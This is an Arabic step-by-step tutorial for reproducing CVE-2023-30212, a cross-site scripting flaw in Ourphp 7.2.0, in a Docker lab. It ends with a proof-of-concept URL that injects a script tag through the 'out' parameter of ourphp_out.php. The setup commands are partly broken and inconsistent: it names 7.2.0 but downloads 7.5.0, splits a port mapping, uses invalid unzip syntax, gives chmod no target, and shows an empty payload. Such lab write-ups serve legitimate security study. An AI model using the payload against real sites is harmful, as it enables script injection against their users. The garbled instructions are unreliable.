
دليل استغلال خطوة بخطوة لـ CVE-2023-30212، ثغرة XSS في Ourphp 7.2.0، مع إعداد Docker وعرض حقن الحمولة.
استغلال ثغرة أمنية في Ourphp الإصدار 7.2.0 والمعروفة أيضًا باسم CVE 2023 30212
الخطوة 1. قم بتنزيل وتثبيت Docker على نظامك (ملاحظة). أستخدم Docker لأنه سريع وسهل لتثبيت ubuntu.
الخطوة 2. إعداد بيئة Docker
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
الخطوة 3. تثبيت خادم الويب و php & mysql. سأقوم بتثبيت خادم xampp لهذا الغرض.
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
الخطوة 4. تنزيل Ourphp الإصدار 7.2.0
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
الخطوة 5. إعداد Ourphp على المتصفح افتح متصفحك وأدخل localhost أو 127.0.0.1 اتبع التعليمات وقم بتثبيت Ourphp.
الخطوة 6. استغلال الثغرة الأمنية يحتوي الإصدار 7.2.0 من Ourphp على ثغرة أمنية من نوع XSS (Cross-Site Scripting). للتخفيف من الثغرة الأمنية في الملف /client/manage/ourphp_out.php الذي يسمح بتنفيذ كود XSS،
تحتاج إلى تعديل الكود. تنشأ الثغرة عندما يتم تعيين المعامل "ourphp_admin" إلى "logout"، ويتم عرض المتغير القابل للتحكم "out".
يمكن للمهاجمين استغلال ذلك عن طريق حقن حمولة مثل "".
Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
